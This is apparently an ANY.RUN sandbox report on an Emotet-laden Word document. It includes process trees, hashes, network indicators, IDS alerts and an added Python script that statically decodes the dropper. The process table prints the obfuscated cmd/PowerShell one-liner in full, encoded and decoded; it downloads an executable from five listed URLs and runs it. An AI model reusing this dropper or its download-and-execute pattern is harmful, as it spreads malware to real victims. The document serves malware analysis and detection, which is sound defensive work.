File name: | 121920189I906553.doc |
Full analysis: | https://app.any.run/tasks/98ea69a1-c85f-44c3-8741-57b73c67cecc |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over its lifetime it has been upgraded into very destructive malware. It mostly targets corporate victims, but private users are also infected through mass spam email campaigns. |
Analysis date: | December 19, 2018, 02:47:13 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Dec 18 20:15:00 2018, Last Saved Time/Date: Tue Dec 18 20:15:00 2018, Number of Pages: 1, Number of Words: 4, Number of Characters: 26, Security: 0 |
MD5: | 2A771EF11F2BBB7BEDF0394ED08ADAA3 |
SHA1: | A063644A469D14C083464DA1B9E86D154B0C77F5 |
SHA256: | 3C18597017EF58FEE97F8B28879DABEEC6DAE7A968A56A891D07D1DC52DDC3AF |
SSDEEP: | 1536:bd81ooMDS034nC54nZrL4AkiuAMOkEEW/yEbzvadugQ8UUaovoU+a9:bd8GhDS0o9zTGOZD6EbzCdugQ8/o |
Extension | File type (TrID) | Match (%)
---|---|---
.doc | Microsoft Word document | 54.2
.doc | Microsoft Word document (old ver.) | 32.2
Title: | - |
---|---|
Subject: | - |
Author: | - |
Keywords: | - |
Comments: | - |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2018:12:18 20:15:00 |
ModifyDate: | 2018:12:18 20:15:00 |
Pages: | 1 |
Words: | 4 |
Characters: | 26 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | - |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 29 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: | - |
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | Parent | Command line | Image path | User, integrity | Image description, version, exit code
---|---|---|---|---|---
3464 | explorer.exe | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\121920189I906553.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | admin, MEDIUM | Microsoft Word 14.0.6024.1000 (Microsoft Corporation); no exit code recorded
2616 | WINWORD.EXE | c:\i0651860547267\h3249438289644\Q4051730915624\..\..\..\windows\system32\cmd.exe /c %pRogRaMdATa:~0,1%%prOGraMdATA:~9,2% /V:On /C " sET AP=;'378s'=811a$}}{hctac}};kaerb;'416I'=713D$;650T$ metI-ekovnI{ )00008 eg- htgnel.)650T$ metI-teG(( fI;'499O'=403E$;)650T$ ,554A$(eliFdaolnwoD.714o${yrt{)105C$ ni 554A$(hcaerof;'exe.'+846j$+'\'+pmet:vne$=650T$;'610Q'=557f$;'876' = 846j$;'316G'=988C$;)'@'(tilpS.'HISlYGVwv/slianbmuhTpw/segami/lortnocemoh/moc.gnisiurctsuj//:ptth@44lqDch2/ten.ngisedycal//:ptth@ttcvje2by5/moc.ennaojybedam//:ptth@xxaiBq8Ga/moc.zepolohcnap//:ptth@qFAy6Zuy/moc.syskilk//:ptth'=105C$;tneilCbeW.teN tcejbo-wen=714o$;'234w'=126j$ ll%1,3-~:PMET%h%1,4-~:EMANNOISSES%r%1,5~:CILBUP%wop& FOr /l %3 iN ( 554 -1 0)do SET 7ne=!7ne!!AP:~ %3, 1!&IF %3 == 0 ecHO !7ne:~5! \| C%appdAtA:~-4,1%%sYSTeMrooT:~-4,-3% " | c:\windows\system32\cmd.exe | admin, MEDIUM | Windows Command Processor 6.1.7601.17514 (win7sp1_rtm.101119-1850) (Microsoft Corporation); exit code 0
3140 | cmd.exe | CmD /V:On /C " sET AP=;'378s'=811a$}}{hctac}};kaerb;'416I'=713D$;650T$ metI-ekovnI{ )00008 eg- htgnel.)650T$ metI-teG(( fI;'499O'=403E$;)650T$ ,554A$(eliFdaolnwoD.714o${yrt{)105C$ ni 554A$(hcaerof;'exe.'+846j$+'\'+pmet:vne$=650T$;'610Q'=557f$;'876' = 846j$;'316G'=988C$;)'@'(tilpS.'HISlYGVwv/slianbmuhTpw/segami/lortnocemoh/moc.gnisiurctsuj//:ptth@44lqDch2/ten.ngisedycal//:ptth@ttcvje2by5/moc.ennaojybedam//:ptth@xxaiBq8Ga/moc.zepolohcnap//:ptth@qFAy6Zuy/moc.syskilk//:ptth'=105C$;tneilCbeW.teN tcejbo-wen=714o$;'234w'=126j$ ll%1,3-~:PMET%h%1,4-~:EMANNOISSES%r%1,5~:CILBUP%wop& FOr /l %3 iN ( 554 -1 0)do SET 7ne=!7ne!!AP:~ %3, 1!&IF %3 == 0 ecHO !7ne:~5! \| Cmd " | C:\Windows\system32\cmd.exe | admin, MEDIUM | Windows Command Processor 6.1.7601.17514 (win7sp1_rtm.101119-1850) (Microsoft Corporation); exit code 0
3240 | cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" ecHO pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $j621='w432';$o417=new-object Net.WebClient;$C501='http://kliksys.com/yuZ6yAFq@http://pancholopez.com/aG8qBiaxx@http://madebyjoanne.com/5yb2ejvctt@http://lacydesign.net/2hcDql44@http://justcruising.com/homecontrol/images/wpThumbnails/vwVGYlSIH'.Split('@');$C889='G613';$j648 = '678';$f755='Q016';$T056=$env:temp+'\'+$j648+'.exe';foreach($A455 in $C501){try{$o417.DownloadFile($A455, $T056);$E304='O994';If ((Get-Item $T056).length -ge 80000) {Invoke-Item $T056;$D317='I614';break;}}catch{}}$a118='s873'; " | C:\Windows\system32\cmd.exe | admin, MEDIUM | Windows Command Processor 6.1.7601.17514 (win7sp1_rtm.101119-1850) (Microsoft Corporation); exit code 0
3308 | cmd.exe | Cmd | C:\Windows\system32\cmd.exe | admin, MEDIUM | Windows Command Processor 6.1.7601.17514 (win7sp1_rtm.101119-1850) (Microsoft Corporation); exit code 0
3752 | cmd.exe | powershell $j621='w432';$o417=new-object Net.WebClient;$C501='http://kliksys.com/yuZ6yAFq@http://pancholopez.com/aG8qBiaxx@http://madebyjoanne.com/5yb2ejvctt@http://lacydesign.net/2hcDql44@http://justcruising.com/homecontrol/images/wpThumbnails/vwVGYlSIH'.Split('@');$C889='G613';$j648 = '678';$f755='Q016';$T056=$env:temp+'\'+$j648+'.exe';foreach($A455 in $C501){try{$o417.DownloadFile($A455, $T056);$E304='O994';If ((Get-Item $T056).length -ge 80000) {Invoke-Item $T056;$D317='I614';break;}}catch{}}$a118='s873'; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | admin, MEDIUM | Windows PowerShell 6.1.7600.16385 (win7_rtm.090713-1255) (Microsoft Corporation); exit code 0
2792 | powershell.exe | "C:\Users\admin\AppData\Local\Temp\678.exe" | C:\Users\admin\AppData\Local\Temp\678.exe | admin, MEDIUM | Version-resource strings as captured (truncated): company "Microsoft Corporat", description "Stoh Levadihote (non-ShiftLock) Keyboa"; exit code 0
3552 | 678.exe | "C:\Users\admin\AppData\Local\Temp\678.exe" | C:\Users\admin\AppData\Local\Temp\678.exe | admin, MEDIUM | Version-resource strings as captured (truncated): company "Microsoft Corporat", description "Stoh Levadihote (non-ShiftLock) Keyboa"; exit code 0
2948 | 678.exe | "C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe" | C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe | admin, MEDIUM | Version-resource strings as captured (truncated): company "Microsoft Corporat", description "Stoh Levadihote (non-ShiftLock) Keyboa"; exit code 0
3564 | archivesymbol.exe | "C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe" | C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe | admin, MEDIUM | Version-resource strings as captured (truncated): company "Microsoft Corporat", description "Stoh Levadihote (non-ShiftLock) Keyboa"; no exit code recorded
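The process tree above is the whole infection chain. WINWORD.EXE (3464) spawns cmd.exe (2616) through a path that walks out of three non-existent directories with `..\..\..`; Windows collapses those components without checking that the directories exist, and the image path column shows the real binary, c:\windows\system32\cmd.exe. That cmd builds the word `CmD` from two substrings of %ProgramData% and starts a second cmd (3140) with delayed expansion enabled, which stores the PowerShell one-liner reversed in the variable AP, rebuilds it one character at a time with `FOr /l %3 iN ( 554 -1 0)`, and echoes the result minus its first five characters into a third cmd (3308) that reads its command from stdin; the cmd that runs the left side of that pipe (3240) is where `pow%PUBLIC:~5,1%r...` is expanded into `powershell`. PowerShell (3752) tries five URLs in order, saves the first response of at least 80000 bytes as %TEMP%\678.exe and runs it, which is why only kliksys.com (124 KB, HTTP 200 after a 301) shows up in the HTTP requests table. 678.exe re-executes itself (2792, 3552), writes a copy to %LocalAppData%\archivesymbol\archivesymbol.exe and starts it (2948, 3564); that copy is the process behind the Emotet and Feodo IDS alerts.

The Python below is added here as a worked example; it is not part of the ANY.RUN report. It replays those cmd stages instead of executing them, emulating the two cmd.exe rules the sample depends on: `%VAR:~start,len%` substring extraction, and the command-line-mode behaviour that leaves a reference to an undefined variable in place, so the first loop iteration produces the literal `!7ne!` (five characters) at the front of the rebuilt string, which is exactly what `!7ne:~5!` strips. TEMP and APPDATA are taken from paths in the report; PROGRAMDATA, SYSTEMROOT, PUBLIC and SESSIONNAME are assumed Windows 7 defaults, and the regular expressions are written for this sample's `set` / `for /l` / `echo | cmd` layout, not for arbitrary batch.

```python
import re

# Environment of the sandbox VM, keys upper case. TEMP and APPDATA come from
# paths in the report; the other four are assumed Windows 7 defaults.
SANDBOX_ENV = {
    "PROGRAMDATA": r"C:\ProgramData",
    "APPDATA": r"C:\Users\admin\AppData\Roaming",
    "SYSTEMROOT": r"C:\Windows",
    "PUBLIC": r"C:\Users\Public",
    "SESSIONNAME": "Console",
    "TEMP": r"C:\Users\admin\AppData\Local\Temp",
}

# The AP value and the command line around it, copied from the row for PID 2616.
AP_REVERSED = (
    r";'378s'=811a$}}{hctac}};kaerb;'416I'=713D$;650T$ metI-ekovnI{ )00008 eg- htgnel.)650T$ metI-teG(( fI"
    r";'499O'=403E$;)650T$ ,554A$(eliFdaolnwoD.714o${yrt{)105C$ ni 554A$(hcaerof;'exe.'+846j$+'\'+pmet:vne$=650T$"
    r";'610Q'=557f$;'876' = 846j$;'316G'=988C$;)'@'(tilpS.'HISlYGVwv/slianbmuhTpw/segami/lortnocemoh/moc.gnisiurctsuj//:ptth"
    r"@44lqDch2/ten.ngisedycal//:ptth@ttcvje2by5/moc.ennaojybedam//:ptth@xxaiBq8Ga/moc.zepolohcnap//:ptth@qFAy6Zuy/moc.syskilk//:ptth"
    r"'=105C$;tneilCbeW.teN tcejbo-wen=714o$;'234w'=126j$ ll%1,3-~:PMET%h%1,4-~:EMANNOISSES%r%1,5~:CILBUP%wop"
)
CMDLINE_2616 = (
    r"c:\i0651860547267\h3249438289644\Q4051730915624\..\..\..\windows\system32\cmd.exe /c "
    r"%pRogRaMdATa:~0,1%%prOGraMdATA:~9,2% /V:On /C " + '" sET AP=' + AP_REVERSED +
    r"& FOr /l %3 iN ( 554 -1 0)do SET 7ne=!7ne!!AP:~ %3, 1!&IF %3 == 0 ecHO !7ne:~5! "
    r"| C%appdAtA:~-4,1%%sYSTeMrooT:~-4,-3% " + '"'
)


def cmd_substring(value, spec):
    """cmd's ~start,len slice: negative start counts from the end, negative len
    drops characters from the end, a start past the end yields ''."""
    start_s, _, len_s = spec.partition(",")
    n = len(value)
    start = int(start_s) if start_s.strip() else 0
    start = max(n + start, 0) if start < 0 else start
    if start >= n:
        return ""
    if not len_s.strip():
        return value[start:]
    length = int(len_s)
    end = n + length if length < 0 else start + length
    return value[start:max(end, start)]


def expand(text, env, delim):
    """One cmd expansion pass in command-line (not batch) mode: '%' for the
    parse-time pass, '!' for delayed expansion under /V:On. An undefined name is
    left in place and scanning resumes after the opening delimiter, which keeps
    the reversed %PMET% tokens intact and leaves the literal '!7ne!' in 7ne.
    The %VAR:old=new% replacement syntax is not emulated."""
    out, i = [], 0
    while i < len(text):
        j = text.find(delim, i + 1) if text[i] == delim else -1
        if j < 0:
            out.append(text[i])
            i += 1
            continue
        name, sep, spec = text[i + 1:j].partition(":")
        value = env.get(name.upper())
        if value is None or (sep and not spec.startswith("~")):
            out.append(delim)
            i += 1
            continue
        out.append(cmd_substring(value, spec[1:]) if sep else value)
        i = j + 1
    return "".join(out)


def deobfuscate(cmdline, env):
    """Replay the three cmd.exe stages and return the line PowerShell gets."""
    env = {k.upper(): v for k, v in env.items()}
    # Stage 1 (PID 2616): %VAR% expansion over the whole line, quotes included,
    # yields "CmD" and "Cmd"; the inner CmD then runs 'sET AP=<reversed text>'.
    inner = expand(cmdline, env, "%")
    m = re.search(r"set (\w+)=([^&]*)&", inner, re.I)
    env[m.group(1).upper()] = m.group(2)
    # Stage 2 (PID 3140): FOR /L counts the index down and appends one
    # character per iteration, rebuilding the text in forward order.
    m = re.search(r"for /l (%\S) in \(\s*(-?\d+)\s+(-?\d+)\s+(-?\d+)\s*\)\s*do\s+set (\w+)=([^&]*)&",
                  inner, re.I)
    loopvar, dst, body = m.group(1), m.group(5), m.group(6)
    start, step, stop = (int(m.group(k)) for k in (2, 3, 4))
    for i in range(start, stop + (1 if step > 0 else -1), step):
        env[dst.upper()] = expand(body.replace(loopvar, str(i)), env, "!")
    # Stage 3 (PIDs 3240, 3308): the last iteration echoes the rebuilt text into
    # a cmd reading stdin; the cmd running the echo does its own %VAR% pass.
    m = re.search(r"echo (\S+)\s*\|\s*(\S+)", inner, re.I)
    command = expand(expand(m.group(1), env, "!"), env, "%")
    return {"inner": inner, "pipe_target": m.group(2), "command": command}


def powershell_iocs(command, env):
    """URL list, drop path and size gate from the decoded one-liner (only the
    literal-string assignments this sample uses are resolved)."""
    env = {k.upper(): v for k, v in env.items()}
    assigns = dict(re.findall(r"\$(\w+)\s*=\s*'([^']*)'", command))
    urls = re.findall(r"https?://[^\s'\"@]+", command)
    m = re.search(r"\$env:temp\+'\\'\+\$(\w+)\+'(\.\w+)'", command, re.I)
    drop_path = env["TEMP"] + "\\" + assigns[m.group(1)] + m.group(2)
    min_size = int(re.search(r"-ge (\d+)", command).group(1))
    return {"urls": urls, "drop_path": drop_path, "min_size": min_size}


if __name__ == "__main__":
    decoded = deobfuscate(CMDLINE_2616, SANDBOX_ENV)["command"]
    print(decoded, powershell_iocs(decoded, SANDBOX_ENV), sep="\n")
```

Running it prints the `powershell $j621=...` line that matches PID 3752, the five download URLs, C:\Users\admin\AppData\Local\Temp\678.exe and the 80000-byte gate. The intermediate `inner` string is the PID 3140 command line, so each stage can be checked against the table. The decode depends on the victim's environment only through the substring sources; SESSIONNAME is `Console` at the physical console but `RDP-Tcp#<n>` in a Remote Desktop session, where `%SESSIONNAME:~-4,1%` gives a different letter and the chain breaks, so an analyst VM driven over RDP can behave differently from the sandbox for this family.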
PID | Process | Filename | Type | MD5 | SHA256
---|---|---|---|---|---
3464 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRA626.tmp.cvr | — | — | —
3464 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C6A02F1C.wmf | — | — | —
3464 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\82E68F8A.wmf | — | — | —
3752 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\XTVI7N2JDQ0EC273D0HY.temp | — | — | —
3464 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EB1587C7.wmf | wmf | EDB2F62BADC35E507F10B2FAEECC571F | 57A15807E410C55271B1738DE2312D61174E4126E049051484FB241B430DF3DD
3464 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\82A38C6D.wmf | wmf | 89AE3A598DC8A6F06B80197617FD3C2B | 8F959A1B99F7F9A36C972CC4B2E5BA0F22B2C3B54758B1A91F9D36B32B7D4B85
3464 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | B0BB6497035BCC6F81088AD619123F2C | F83CA978E449F70CD3D6FAF4B1D4F7D55D46F5011797B3F9B1766C03B912ED82
3752 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | 0C1DAA668BA499584B0AC7476368101E | 326CCA676EAA6C8A45F71B6239CC22D9F49085AB54229E1777D0E15C50EC13DA
3752 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF13b53a.TMP | binary | 0C1DAA668BA499584B0AC7476368101E | 326CCA676EAA6C8A45F71B6239CC22D9F49085AB54229E1777D0E15C50EC13DA
3552 | 678.exe | C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe | executable | 84192E89E1B2AF10D1F6CCCBD06EF355 | EE2699909F938CD5A35535FA372C36E88163D9C3971283ADAA6F7EF0CD8A2795
PID | Process | Method | HTTP code | IP | URL | CN | Type | Size | Reputation
---|---|---|---|---|---|---|---|---|---
3752 | powershell.exe | GET | 200 | 158.69.193.16:80 | http://kliksys.com/yuZ6yAFq/ | CA | executable | 124 KB | malicious
3564 | archivesymbol.exe | GET | — | 78.189.21.131:80 | http://78.189.21.131/ | TR | — | — | malicious
3752 | powershell.exe | GET | 301 | 158.69.193.16:80 | http://kliksys.com/yuZ6yAFq | CA | html | 236 B | malicious
3564 | archivesymbol.exe | GET | — | 187.140.90.91:8080 | http://187.140.90.91:8080/ | MX | — | — | malicious
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3564 | archivesymbol.exe | 213.120.119.231:8443 | — | British Telecommunications PLC | GB | malicious |
3564 | archivesymbol.exe | 78.189.21.131:80 | — | Turk Telekom | TR | malicious |
3752 | powershell.exe | 158.69.193.16:80 | kliksys.com | OVH SAS | CA | suspicious |
3564 | archivesymbol.exe | 187.140.90.91:8080 | — | Uninet S.A. de C.V. | MX | malicious |
3564 | archivesymbol.exe | 81.150.17.158:50000 | — | British Telecommunications PLC | GB | malicious |
Domain | IP | Reputation
---|---|---
kliksys.com | 158.69.193.16 | malicious
PID | Process | Class | Message |
---|---|---|---|
3752 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
3752 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32 |
3752 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3752 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
3752 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
3564 | archivesymbol.exe | A Network Trojan was detected | SC SPYWARE Spyware Emotet Win32 |
3564 | archivesymbol.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo HTTP request |
3564 | archivesymbol.exe | A Network Trojan was detected | SC SPYWARE Spyware Emotet Win32 |
3564 | archivesymbol.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo HTTP request |